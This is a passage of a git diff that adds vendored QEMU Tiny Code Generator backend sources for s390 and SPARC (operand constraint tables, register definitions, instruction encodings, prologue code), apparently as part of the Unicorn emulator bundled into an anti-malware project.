}, + + { INDEX_op_ld8u_i32, { "r", "r" } }, + { INDEX_op_ld8s_i32, { "r", "r" } }, + { INDEX_op_ld16u_i32, { "r", "r" } }, + { INDEX_op_ld16s_i32, { "r", "r" } }, + { INDEX_op_ld_i32, { "r", "r" } }, + { INDEX_op_st8_i32, { "r", "r" } }, + { INDEX_op_st16_i32, { "r", "r" } }, + { INDEX_op_st_i32, { "r", "r" } }, + + { INDEX_op_add_i32, { "r", "r", "ri" } }, + { INDEX_op_sub_i32, { "r", "0", "ri" } }, + { INDEX_op_mul_i32, { "r", "0", "rK" } }, + + { INDEX_op_div2_i32, { "b", "a", "0", "1", "r" } }, + { INDEX_op_divu2_i32, { "b", "a", "0", "1", "r" } }, + + { INDEX_op_and_i32, { "r", "0", "ri" } }, + { INDEX_op_or_i32, { "r", "0", "rO" } }, + { INDEX_op_xor_i32, { "r", "0", "rX" } }, + + { INDEX_op_neg_i32, { "r", "r" } }, + + { INDEX_op_shl_i32, { "r", "0", "Ri" } }, + { INDEX_op_shr_i32, { "r", "0", "Ri" } }, + { INDEX_op_sar_i32, { "r", "0", "Ri" } }, + + { INDEX_op_rotl_i32, { "r", "r", "Ri" } }, + { INDEX_op_rotr_i32, { "r", "r", "Ri" } }, + + { INDEX_op_ext8s_i32, { "r", "r" } }, + { INDEX_op_ext8u_i32, { "r", "r" } }, + { INDEX_op_ext16s_i32, { "r", "r" } }, + { INDEX_op_ext16u_i32, { "r", "r" } }, + + { INDEX_op_bswap16_i32, { "r", "r" } }, + { INDEX_op_bswap32_i32, { "r", "r" } }, + + { INDEX_op_add2_i32, { "r", "r", "0", "1", "rA", "r" } }, + { INDEX_op_sub2_i32, { "r", "r", "0", "1", "rA", "r" } }, + + { INDEX_op_brcond_i32, { "r", "rC" } }, + { INDEX_op_setcond_i32, { "r", "r", "rC" } }, + { INDEX_op_movcond_i32, { "r", "r", "rC", "r", "0" } }, + { INDEX_op_deposit_i32, { "r", "0", "r" } }, + + { INDEX_op_qemu_ld_i32, { "r", "L" } }, + { INDEX_op_qemu_ld_i64, { "r", "L" } }, + { INDEX_op_qemu_st_i32, { "L", "L" } }, + { INDEX_op_qemu_st_i64, { "L", "L" } }, + + { INDEX_op_ld8u_i64, { "r", "r" } }, + { INDEX_op_ld8s_i64, { "r", "r" } }, + { INDEX_op_ld16u_i64, { "r", "r" } }, + { INDEX_op_ld16s_i64, { "r", "r" } }, + { INDEX_op_ld32u_i64, { "r", "r" } }, + { INDEX_op_ld32s_i64, { "r", "r" } }, + { INDEX_op_ld_i64, { "r", "r" } }, + + { INDEX_op_st8_i64, { "r", "r" } }, + { INDEX_op_st16_i64, { "r", "r" } }, + { INDEX_op_st32_i64, { "r", "r" } }, + { INDEX_op_st_i64, { "r", "r" } }, + + { INDEX_op_add_i64, { "r", "r", "ri" } }, + { INDEX_op_sub_i64, { "r", "0", "ri" } }, + { INDEX_op_mul_i64, { "r", "0", "rK" } }, + + { INDEX_op_div2_i64, { "b", "a", "0", "1", "r" } }, + { INDEX_op_divu2_i64, { "b", "a", "0", "1", "r" } }, + { INDEX_op_mulu2_i64, { "b", "a", "0", "r" } }, + + { INDEX_op_and_i64, { "r", "0", "ri" } }, + { INDEX_op_or_i64, { "r", "0", "rO" } }, + { INDEX_op_xor_i64, { "r", "0", "rX" } }, + + { INDEX_op_neg_i64, { "r", "r" } }, + + { INDEX_op_shl_i64, { "r", "r", "Ri" } }, + { INDEX_op_shr_i64, { "r", "r", "Ri" } }, + { INDEX_op_sar_i64, { "r", "r", "Ri" } }, + + { INDEX_op_rotl_i64, { "r", "r", "Ri" } }, + { INDEX_op_rotr_i64, { "r", "r", "Ri" } }, + + { INDEX_op_ext8s_i64, { "r", "r" } }, + { INDEX_op_ext8u_i64, { "r", "r" } }, + { INDEX_op_ext16s_i64, { "r", "r" } }, + { INDEX_op_ext16u_i64, { "r", "r" } }, + { INDEX_op_ext32s_i64, { "r", "r" } }, + { INDEX_op_ext32u_i64, { "r", "r" } }, + + { INDEX_op_bswap16_i64, { "r", "r" } }, + { INDEX_op_bswap32_i64, { "r", "r" } }, + { INDEX_op_bswap64_i64, { "r", "r" } }, + + { INDEX_op_add2_i64, { "r", "r", "0", "1", "rA", "r" } }, + { INDEX_op_sub2_i64, { "r", "r", "0", "1", "rA", "r" } }, + + { INDEX_op_brcond_i64, { "r", "rC" } }, + { INDEX_op_setcond_i64, { "r", "r", "rC" } }, + { INDEX_op_movcond_i64, { "r", "r", "rC", "r", "0" } }, + { INDEX_op_deposit_i64, { "r", "0", "r" } }, + + { -1 }, +}; + +static void query_facilities(void) +{ + unsigned long hwcap = qemu_getauxval(AT_HWCAP); + + /* Is STORE FACILITY LIST EXTENDED available? Honestly, I believe this + is present on all 64-bit systems, but let's check for it anyway. */ + if (hwcap & HWCAP_S390_STFLE) { + register int r0 __asm__("0"); + register void *r1 __asm__("1"); + + /* stfle 0(%r1) */ + r1 = &facilities; + asm volatile(".word 0xb2b0,0x1000" + : "=r"(r0) : "0"(0), "r"(r1) : "memory", "cc"); + } +} + +static void tcg_target_init(TCGContext *s) +{ + query_facilities(); + + tcg_regset_set32(s->tcg_target_available_regs[TCG_TYPE_I32], 0, 0xffff); + tcg_regset_set32(s->tcg_target_available_regs[TCG_TYPE_I64], 0, 0xffff); + + tcg_regset_clear(s->tcg_target_call_clobber_regs); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R0); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R1); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R2); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R3); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R4); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R5); + /* The r6 register is technically call-saved, but it's also a parameter + register, so it can get killed by setup for the qemu_st helper. */ + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R6); + /* The return register can be considered call-clobbered. */ + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R14); + + tcg_regset_clear(s->reserved_regs); + tcg_regset_set_reg(s->reserved_regs, TCG_TMP0); + /* XXX many insns can't be used with R0, so we better avoid it for now */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R0); + tcg_regset_set_reg(s->reserved_regs, TCG_REG_CALL_STACK); + + tcg_add_target_add_op_defs(s, s390_op_defs); +} + +#define FRAME_SIZE ((int)(TCG_TARGET_CALL_STACK_OFFSET \ + + TCG_STATIC_CALL_ARGS_SIZE \ + + CPU_TEMP_BUF_NLONGS * sizeof(long))) + +static void tcg_target_qemu_prologue(TCGContext *s) +{ + /* stmg %r6,%r15,48(%r15) (save registers) */ + tcg_out_insn(s, RXY, STMG, TCG_REG_R6, TCG_REG_R15, TCG_REG_R15, 48); + + /* aghi %r15,-frame_size */ + tcg_out_insn(s, RI, AGHI, TCG_REG_R15, -FRAME_SIZE); + + tcg_set_frame(s, TCG_REG_CALL_STACK, + TCG_STATIC_CALL_ARGS_SIZE + TCG_TARGET_CALL_STACK_OFFSET, + CPU_TEMP_BUF_NLONGS * sizeof(long)); + + if (GUEST_BASE >= 0x80000) { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_GUEST_BASE_REG, GUEST_BASE); + tcg_regset_set_reg(s->reserved_regs, TCG_GUEST_BASE_REG); + } + + tcg_out_mov(s, TCG_TYPE_PTR, TCG_AREG0, tcg_target_call_iarg_regs[0]); + /* br %r3 (go to TB) */ + tcg_out_insn(s, RR, BCR, S390_CC_ALWAYS, tcg_target_call_iarg_regs[1]); + + tb_ret_addr = s->code_ptr; + + /* lmg %r6,%r15,fs+48(%r15) (restore registers) */ + tcg_out_insn(s, RXY, LMG, TCG_REG_R6, TCG_REG_R15, TCG_REG_R15, + FRAME_SIZE + 48); + + /* br %r14 (return) */ + tcg_out_insn(s, RR, BCR, S390_CC_ALWAYS, TCG_REG_R14); +} + +#define ELF_HOST_MACHINE EM_S390 diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/s390/tcg-target.h b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/s390/tcg-target.h new file mode 100644 index 0000000..5acc28c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/s390/tcg-target.h @@ -0,0 +1,122 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2009 Ulrich Hecht + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ +#ifndef TCG_TARGET_S390 +#define TCG_TARGET_S390 1 + +#define TCG_TARGET_INSN_UNIT_SIZE 2 + +typedef enum TCGReg { + TCG_REG_R0 = 0, + TCG_REG_R1, + TCG_REG_R2, + TCG_REG_R3, + TCG_REG_R4, + TCG_REG_R5, + TCG_REG_R6, + TCG_REG_R7, + TCG_REG_R8, + TCG_REG_R9, + TCG_REG_R10, + TCG_REG_R11, + TCG_REG_R12, + TCG_REG_R13, + TCG_REG_R14, + TCG_REG_R15 +} TCGReg; + +#define TCG_TARGET_NB_REGS 16 + +/* optional instructions */ +#define TCG_TARGET_HAS_div2_i32 1 +#define TCG_TARGET_HAS_rot_i32 1 +#define TCG_TARGET_HAS_ext8s_i32 1 +#define TCG_TARGET_HAS_ext16s_i32 1 +#define TCG_TARGET_HAS_ext8u_i32 1 +#define TCG_TARGET_HAS_ext16u_i32 1 +#define TCG_TARGET_HAS_bswap16_i32 1 +#define TCG_TARGET_HAS_bswap32_i32 1 +#define TCG_TARGET_HAS_not_i32 0 +#define TCG_TARGET_HAS_neg_i32 1 +#define TCG_TARGET_HAS_andc_i32 0 +#define TCG_TARGET_HAS_orc_i32 0 +#define TCG_TARGET_HAS_eqv_i32 0 +#define TCG_TARGET_HAS_nand_i32 0 +#define TCG_TARGET_HAS_nor_i32 0 +#define TCG_TARGET_HAS_deposit_i32 1 +#define TCG_TARGET_HAS_movcond_i32 1 +#define TCG_TARGET_HAS_add2_i32 1 +#define TCG_TARGET_HAS_sub2_i32 1 +#define TCG_TARGET_HAS_mulu2_i32 0 +#define TCG_TARGET_HAS_muls2_i32 0 +#define TCG_TARGET_HAS_muluh_i32 0 +#define TCG_TARGET_HAS_mulsh_i32 0 +#define TCG_TARGET_HAS_trunc_shr_i32 0 + +#define TCG_TARGET_HAS_div2_i64 1 +#define TCG_TARGET_HAS_rot_i64 1 +#define TCG_TARGET_HAS_ext8s_i64 1 +#define TCG_TARGET_HAS_ext16s_i64 1 +#define TCG_TARGET_HAS_ext32s_i64 1 +#define TCG_TARGET_HAS_ext8u_i64 1 +#define TCG_TARGET_HAS_ext16u_i64 1 +#define TCG_TARGET_HAS_ext32u_i64 1 +#define TCG_TARGET_HAS_bswap16_i64 1 +#define TCG_TARGET_HAS_bswap32_i64 1 +#define TCG_TARGET_HAS_bswap64_i64 1 +#define TCG_TARGET_HAS_not_i64 0 +#define TCG_TARGET_HAS_neg_i64 1 +#define TCG_TARGET_HAS_andc_i64 0 +#define TCG_TARGET_HAS_orc_i64 0 +#define TCG_TARGET_HAS_eqv_i64 0 +#define TCG_TARGET_HAS_nand_i64 0 +#define TCG_TARGET_HAS_nor_i64 0 +#define TCG_TARGET_HAS_deposit_i64 1 +#define TCG_TARGET_HAS_movcond_i64 1 +#define TCG_TARGET_HAS_add2_i64 1 +#define TCG_TARGET_HAS_sub2_i64 1 +#define TCG_TARGET_HAS_mulu2_i64 1 +#define TCG_TARGET_HAS_muls2_i64 0 +#define TCG_TARGET_HAS_muluh_i64 0 +#define TCG_TARGET_HAS_mulsh_i64 0 + +extern bool tcg_target_deposit_valid(int ofs, int len); +#define TCG_TARGET_deposit_i32_valid tcg_target_deposit_valid +#define TCG_TARGET_deposit_i64_valid tcg_target_deposit_valid + +/* used for function call generation */ +#define TCG_REG_CALL_STACK TCG_REG_R15 +#define TCG_TARGET_STACK_ALIGN 8 +#define TCG_TARGET_CALL_STACK_OFFSET 160 + +#define TCG_TARGET_EXTEND_ARGS 1 + +enum { + TCG_AREG0 = TCG_REG_R10, +}; + +static inline void flush_icache_range(uintptr_t start, uintptr_t stop) +{ +} + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/sparc/tcg-target.c b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/sparc/tcg-target.c new file mode 100644 index 0000000..3fcdcad --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/sparc/tcg-target.c @@ -0,0 +1,1613 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +#include "tcg-be-null.h" + +#ifndef NDEBUG +static const char * const tcg_target_reg_names[TCG_TARGET_NB_REGS] = { + "%g0", + "%g1", + "%g2", + "%g3", + "%g4", + "%g5", + "%g6", + "%g7", + "%o0", + "%o1", + "%o2", + "%o3", + "%o4", + "%o5", + "%o6", + "%o7", + "%l0", + "%l1", + "%l2", + "%l3", + "%l4", + "%l5", + "%l6", + "%l7", + "%i0", + "%i1", + "%i2", + "%i3", + "%i4", + "%i5", + "%i6", + "%i7", +}; +#endif + +#ifdef __arch64__ +# define SPARC64 1 +#else +# define SPARC64 0 +#endif + +/* Note that sparcv8plus can only hold 64 bit quantities in %g and %o + registers. These are saved manually by the kernel in full 64-bit + slots. The %i and %l registers are saved by the register window + mechanism, which only allocates space for 32 bits. Given that this + window spill/fill can happen on any signal, we must consider the + high bits of the %i and %l registers garbage at all times. */ +#if SPARC64 +# define ALL_64 0xffffffffu +#else +# define ALL_64 0xffffu +#endif + +/* Define some temporary registers. T2 is used for constant generation. */ +#define TCG_REG_T1 TCG_REG_G1 +#define TCG_REG_T2 TCG_REG_O7 + +#ifdef CONFIG_USE_GUEST_BASE +# define TCG_GUEST_BASE_REG TCG_REG_I5 +#else +# define TCG_GUEST_BASE_REG TCG_REG_G0 +#endif + +static const int tcg_target_reg_alloc_order[] = { + TCG_REG_L0, + TCG_REG_L1, + TCG_REG_L2, + TCG_REG_L3, + TCG_REG_L4, + TCG_REG_L5, + TCG_REG_L6, + TCG_REG_L7, + + TCG_REG_I0, + TCG_REG_I1, + TCG_REG_I2, + TCG_REG_I3, + TCG_REG_I4, + TCG_REG_I5, + + TCG_REG_G2, + TCG_REG_G3, + TCG_REG_G4, + TCG_REG_G5, + + TCG_REG_O0, + TCG_REG_O1, + TCG_REG_O2, + TCG_REG_O3, + TCG_REG_O4, + TCG_REG_O5, +}; + +static const int tcg_target_call_iarg_regs[6] = { + TCG_REG_O0, + TCG_REG_O1, + TCG_REG_O2, + TCG_REG_O3, + TCG_REG_O4, + TCG_REG_O5, +}; + +static const int tcg_target_call_oarg_regs[] = { + TCG_REG_O0, + TCG_REG_O1, + TCG_REG_O2, + TCG_REG_O3, +}; + +#define INSN_OP(x) ((x) << 30) +#define INSN_OP2(x) ((x) << 22) +#define INSN_OP3(x) ((x) << 19) +#define INSN_OPF(x) ((x) << 5) +#define INSN_RD(x) ((x) << 25) +#define INSN_RS1(x) ((x) << 14) +#define INSN_RS2(x) (x) +#define INSN_ASI(x) ((x) << 5) + +#define INSN_IMM10(x) ((1 << 13) | ((x) & 0x3ff)) +#define INSN_IMM11(x) ((1 << 13) | ((x) & 0x7ff)) +#define INSN_IMM13(x) ((1 << 13) | ((x) & 0x1fff)) +#define INSN_OFF16(x) ((((x) >> 2) & 0x3fff) | ((((x) >> 16) & 3) << 20)) +#define INSN_OFF19(x) (((x) >> 2) & 0x07ffff) +#define INSN_COND(x) ((x) << 25) + +#define COND_N 0x0 +#define COND_E 0x1 +#define COND_LE 0x2 +#define COND_L 0x3 +#define COND_LEU 0x4 +#define COND_CS 0x5 +#define COND_NEG 0x6 +#define COND_VS 0x7 +#define COND_A 0x8 +#define COND_NE 0x9 +#define COND_G 0xa +#define COND_GE 0xb +#define COND_GU 0xc +#define COND_CC 0xd +#define COND_POS 0xe +#define COND_VC 0xf +#define BA (INSN_OP(0) | INSN_COND(COND_A) | INSN_OP2(0x2)) + +#define RCOND_Z 1 +#define RCOND_LEZ 2 +#define RCOND_LZ 3 +#define RCOND_NZ 5 +#define RCOND_GZ 6 +#define RCOND_GEZ 7 + +#define MOVCC_ICC (1 << 18) +#define MOVCC_XCC (1 << 18 | 1 << 12) + +#define BPCC_ICC 0 +#define BPCC_XCC (2 << 20) +#define BPCC_PT (1 << 19) +#define BPCC_PN 0 +#define BPCC_A (1 << 29) + +#define BPR_PT BPCC_PT + +#define ARITH_ADD (INSN_OP(2) | INSN_OP3(0x00)) +#define ARITH_ADDCC (INSN_OP(2) | INSN_OP3(0x10)) +#define ARITH_AND (INSN_OP(2) | INSN_OP3(0x01)) +#define ARITH_ANDN (INSN_OP(2) | INSN_OP3(0x05)) +#define ARITH_OR (INSN_OP(2) | INSN_OP3(0x02)) +#define ARITH_ORCC (INSN_OP(2) | INSN_OP3(0x12)) +#define ARITH_ORN (INSN_OP(2) | INSN_OP3(0x06)) +#define ARITH_XOR (INSN_OP(2) | INSN_OP3(0x03)) +#define ARITH_SUB (INSN_OP(2) | INSN_OP3(0x04)) +#define ARITH_SUBCC (INSN_OP(2) | INSN_OP3(0x14)) +#define ARITH_ADDC (INSN_OP(2) | INSN_OP3(0x08)) +#define ARITH_SUBC (INSN_OP(2) | INSN_OP3(0x0c)) +#define ARITH_UMUL (INSN_OP(2) | INSN_OP3(0x0a)) +#define ARITH_SMUL (INSN_OP(2) | INSN_OP3(0x0b)) +#define ARITH_UDIV (INSN_OP(2) | INSN_OP3(0x0e)) +#define ARITH_SDIV (INSN_OP(2) | INSN_OP3(0x0f)) +#define ARITH_MULX (INSN_OP(2) | INSN_OP3(0x09)) +#define ARITH_UDIVX (INSN_OP(2) | INSN_OP3(0x0d)) +#define ARITH_SDIVX (INSN_OP(2) | INSN_OP3(0x2d)) +#define ARITH_MOVCC (INSN_OP(2) | INSN_OP3(0x2c)) +#define ARITH_MOVR (INSN_OP(2) | INSN_OP3(0x2f)) + +#define ARITH_ADDXC (INSN_OP(2) | INSN_OP3(0x36) | INSN_OPF(0x11)) +#define ARITH_UMULXHI (INSN_OP(2) | INSN_OP3(0x36) | INSN_OPF(0x16)) + +#define SHIFT_SLL (INSN_OP(2) | INSN_OP3(0x25)) +#define SHIFT_SRL (INSN_OP(2) | INSN_OP3(0x26)) +#define SHIFT_SRA (INSN_OP(2) | INSN_OP3(0x27)) + +#define SHIFT_SLLX (INSN_OP(2) | INSN_OP3(0x25) | (1 << 12)) +#define SHIFT_SRLX (INSN_OP(2) | INSN_OP3(0x26) | (1 << 12)) +#define SHIFT_SRAX (INSN_OP(2) | INSN_OP3(0x27) | (1 << 12)) + +#define RDY (INSN_OP(2) | INSN_OP3(0x28) | INSN_RS1(0)) +#define WRY (INSN_OP(2) | INSN_OP3(0x30) | INSN_RD(0)) +#define JMPL (INSN_OP(2) | INSN_OP3(0x38)) +#define RETURN (INSN_OP(2) | INSN_OP3(0x39)) +#define SAVE (INSN_OP(2) | INSN_OP3(0x3c)) +#define RESTORE (INSN_OP(2) | INSN_OP3(0x3d)) +#define SETHI (INSN_OP(0) | INSN_OP2(0x4)) +#define CALL INSN_OP(1) +#define LDUB (INSN_OP(3) | INSN_OP3(0x01)) +#define LDSB (INSN_OP(3) | INSN_OP3(0x09)) +#define LDUH (INSN_OP(3) | INSN_OP3(0x02)) +#define LDSH (INSN_OP(3) | INSN_OP3(0x0a)) +#define LDUW (INSN_OP(3) | INSN_OP3(0x00)) +#define LDSW (INSN_OP(3) | INSN_OP3(0x08)) +#define LDX (INSN_OP(3) | INSN_OP3(0x0b)) +#define STB (INSN_OP(3) | INSN_OP3(0x05)) +#define STH (INSN_OP(3) | INSN_OP3(0x06)) +#define STW (INSN_OP(3) | INSN_OP3(0x04)) +#define STX (INSN_OP(3) | INSN_OP3(0x0e)) +#define LDUBA (INSN_OP(3) | INSN_OP3(0x11)) +#define LDSBA (INSN_OP(3) | INSN_OP3(0x19)) +#define LDUHA (INSN_OP(3) | INSN_OP3(0x12)) +#define LDSHA (INSN_OP(3) | INSN_OP3(0x1a)) +#define LDUWA (INSN_OP(3) | INSN_OP3(0x10)) +#define LDSWA (INSN_OP(3) | INSN_OP3(0x18)) +#define LDXA (INSN_OP(3) | INSN_OP3(0x1b)) +#define STBA (INSN_OP(3) | INSN_OP3(0x15)) +#define STHA (INSN_OP(3) | INSN_OP3(0x16)) +#define STWA (INSN_OP(3) | INSN_OP3(0x14)) +#define STXA (INSN_OP(3) | INSN_OP3(0x1e)) + +#ifndef ASI_PRIMARY_LITTLE +#define ASI_PRIMARY_LITTLE 0x88 +#endif + +#define LDUH_LE (LDUHA | INSN_ASI(ASI_PRIMARY_LITTLE)) +#define LDSH_LE (LDSHA | INSN_ASI(ASI_PRIMARY_LITTLE)) +#define LDUW_LE (LDUWA | INSN_ASI(ASI_PRIMARY_LITTLE)) +#define LDSW_LE (LDSWA | INSN_ASI(ASI_PRIMARY_LITTLE)) +#define LDX_LE (LDXA | INSN_ASI(ASI_PRIMARY_LITTLE)) + +#define STH_LE (STHA | INSN_ASI(ASI_PRIMARY_LITTLE)) +#define STW_LE (STWA | INSN_ASI(ASI_PRIMARY_LITTLE)) +#define STX_LE (STXA | INSN_ASI(ASI_PRIMARY_LITTLE)) + +#ifndef use_vis3_instructions +bool use_vis3_instructions; +#endif + +static inline int check_fit_i64(int64_t val, unsigned int bits) +{ + return val == sextract64(val, 0, bits); +} + +static inline int check_fit_i32(int32_t val, unsigned int bits) +{ + return val == sextract32(val, 0, bits); +} + +#define check_fit_tl check_fit_i64 +#if SPARC64 +# define check_fit_ptr check_fit_i64 +#else +# define check_fit_ptr check_fit_i32 +#endif + +static void patch_reloc(tcg_insn_unit *code_ptr, int type, + intptr_t value, intptr_t addend) +{ + uint32_t insn; + + assert(addend == 0); + value = tcg_ptr_byte_diff((tcg_insn_unit *)value, code_ptr); + + switch (type) { + case R_SPARC_WDISP16: + if (!check_fit_ptr(value >> 2, 16)) { + tcg_abort(); + } + insn = *code_ptr; + insn &= ~INSN_OFF16(-1); + insn |= INSN_OFF16(value); + *code_ptr = insn; + break; + case R_SPARC_WDISP19: + if (!check_fit_ptr(value >> 2, 19)) { + tcg_abort(); + } + insn = *code_ptr; + insn &= ~INSN_OFF19(-1); + insn |= INSN_OFF19(value); + *code_ptr = insn; + break; + default: + tcg_abort(); + } +} + +/* parse target specific constraints */ +static int target_parse_constraint(TCGArgConstraint *ct, const char **pct_str) +{ + const char *ct_str; + + ct_str = *pct_str; + switch (ct_str[0]) { + case 'r': + ct->ct |= TCG_CT_REG; + tcg_regset_set32(ct->u.regs, 0, 0xffffffff); + break; + case 'R': + ct->ct |= TCG_CT_REG; + tcg_regset_set32(ct->u.regs, 0, ALL_64); + break; + case 'A': /* qemu_ld/st address constraint */ + ct->ct |= TCG_CT_REG; + tcg_regset_set32(ct->u.regs, 0, + TARGET_LONG_BITS == 64 ? ALL_64 : 0xffffffff); + reserve_helpers: + tcg_regset_reset_reg(ct->u.regs, TCG_REG_O0); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_O1); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_O2); + break; + case 's': /* qemu_st data 32-bit constraint */ + ct->ct |= TCG_CT_REG; + tcg_regset_set32(ct->u.regs, 0, 0xffffffff); + goto reserve_helpers; + case 'S': /* qemu_st data 64-bit constraint */ + ct->ct |= TCG_CT_REG; + tcg_regset_set32(ct->u.regs, 0, ALL_64); + goto reserve_helpers; + case 'I': + ct->ct |= TCG_CT_CONST_S11; + break; + case 'J': + ct->ct |= TCG_CT_CONST_S13; + break; + case 'Z': + ct->ct |= TCG_CT_CONST_ZERO; + break; + default: + return -1; + } + ct_str++; + *pct_str = ct_str; + return 0; +} + +/* test if a constant matches the constraint */ +static inline int tcg_target_const_match(tcg_target_long val, TCGType type, + const TCGArgConstraint *arg_ct) +{ + int ct = arg_ct->ct; + + if (ct & TCG_CT_CONST) { + return 1; + } + + if (type == TCG_TYPE_I32) { + val = (int32_t)val; + } + + if ((ct & TCG_CT_CONST_ZERO) && val == 0) { + return 1; + } else if ((ct & TCG_CT_CONST_S11) && check_fit_tl(val, 11)) { + return 1; + } else if ((ct & TCG_CT_CONST_S13) && check_fit_tl(val, 13)) { + return 1; + } else { + return 0; + } +} + +static inline void tcg_out_arith(TCGContext *s, TCGReg rd, TCGReg rs1, + TCGReg rs2, int op) +{ + tcg_out32(s, op | INSN_RD(rd) | INSN_RS1(rs1) | INSN_RS2(rs2)); +} + +static inline void tcg_out_arithi(TCGContext *s, TCGReg rd, TCGReg rs1, + int32_t offset, int op) +{ + tcg_out32(s, op | INSN_RD(rd) | INSN_RS1(rs1) | INSN_IMM13(offset)); +} + +static void tcg_out_arithc(TCGContext *s, TCGReg rd, TCGReg rs1, + int32_t val2, int val2const, int op) +{ + tcg_out32(s, op | INSN_RD(rd) | INSN_RS1(rs1) + | (val2const ? INSN_IMM13(val2) : INSN_RS2(val2))); +} + +static inline void tcg_out_mov(TCGContext *s, TCGType type, + TCGReg ret, TCGReg arg) +{ + if (ret != arg) { + tcg_out_arith(s, ret, arg, TCG_REG_G0, ARITH_OR); + } +} + +static inline void tcg_out_sethi(TCGContext *s, TCGReg ret, uint32_t arg) +{ + tcg_out32(s, SETHI | INSN_RD(ret) | ((arg & 0xfffffc00) >> 10)); +} + +static inline void tcg_out_movi_imm13(TCGContext *s, TCGReg ret, int32_t arg) +{ + tcg_out_arithi(s, ret, TCG_REG_G0, arg, ARITH_OR); +} + +static void tcg_out_movi(TCGContext *s, TCGType type, + TCGReg ret, tcg_target_long arg) +{ + tcg_target_long hi, lo = (int32_t)arg; + + /* Make sure we test 32-bit constants for imm13 properly. */ + if (type == TCG_TYPE_I32) { + arg = lo; + } + + /* A 13-bit constant sign-extended to 64-bits. */ + if (check_fit_tl(arg, 13)) { + tcg_out_movi_imm13(s, ret, arg); + return; + } + + /* A 32-bit constant, or 32-bit zero-extended to 64-bits. */ + if (type == TCG_TYPE_I32 || arg == (uint32_t)arg) { + tcg_out_sethi(s, ret, arg); + if (arg & 0x3ff) { + tcg_out_arithi(s, ret, ret, arg & 0x3ff, ARITH_OR); + } + return; + } + + /* A 32-bit constant sign-extended to 64-bits. */ + if (arg == lo) { + tcg_out_sethi(s, ret, ~arg); + tcg_out_arithi(s, ret, ret, (arg & 0x3ff) | -0x400, ARITH_XOR); + return; + } + + /* A 64-bit constant decomposed into 2 32-bit pieces. */ + if (check_fit_i32(lo, 13)) { + hi = (arg - lo) >> 32; + tcg_out_movi(s, TCG_TYPE_I32, ret, hi); + tcg_out_arithi(s, ret, ret, 32, SHIFT_SLLX); + tcg_out_arithi(s, ret, ret, lo, ARITH_ADD); + } else { + hi = arg >> 32; + tcg_out_movi(s, TCG_TYPE_I32, ret, hi); + tcg_out_movi(s, TCG_TYPE_I32, TCG_REG_T2, lo); + tcg_out_arithi(s, ret, ret, 32, SHIFT_SLLX); + tcg_out_arith(s, ret, ret, TCG_REG_T2, ARITH_OR); + } +} + +static inline void tcg_out_ldst_rr(TCGContext *s, TCGReg data, TCGReg a1, + TCGReg a2, int op) +{ + tcg_out32(s, op | INSN_RD(data) | INSN_RS1(a1) | INSN_RS2(a2)); +} + +static void tcg_out_ldst(TCGContext *s, TCGReg ret, TCGReg addr, + intptr_t offset, int op) +{ + if (check_fit_ptr(offset, 13)) { + tcg_out32(s, op | INSN_RD(ret) | INSN_RS1(addr) | + INSN_IMM13(offset)); + } else { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_T1, offset); + tcg_out_ldst_rr(s, ret, addr, TCG_REG_T1, op); + } +} + +static inline void tcg_out_ld(TCGContext *s, TCGType type, TCGReg ret, + TCGReg arg1, intptr_t arg2) +{ + 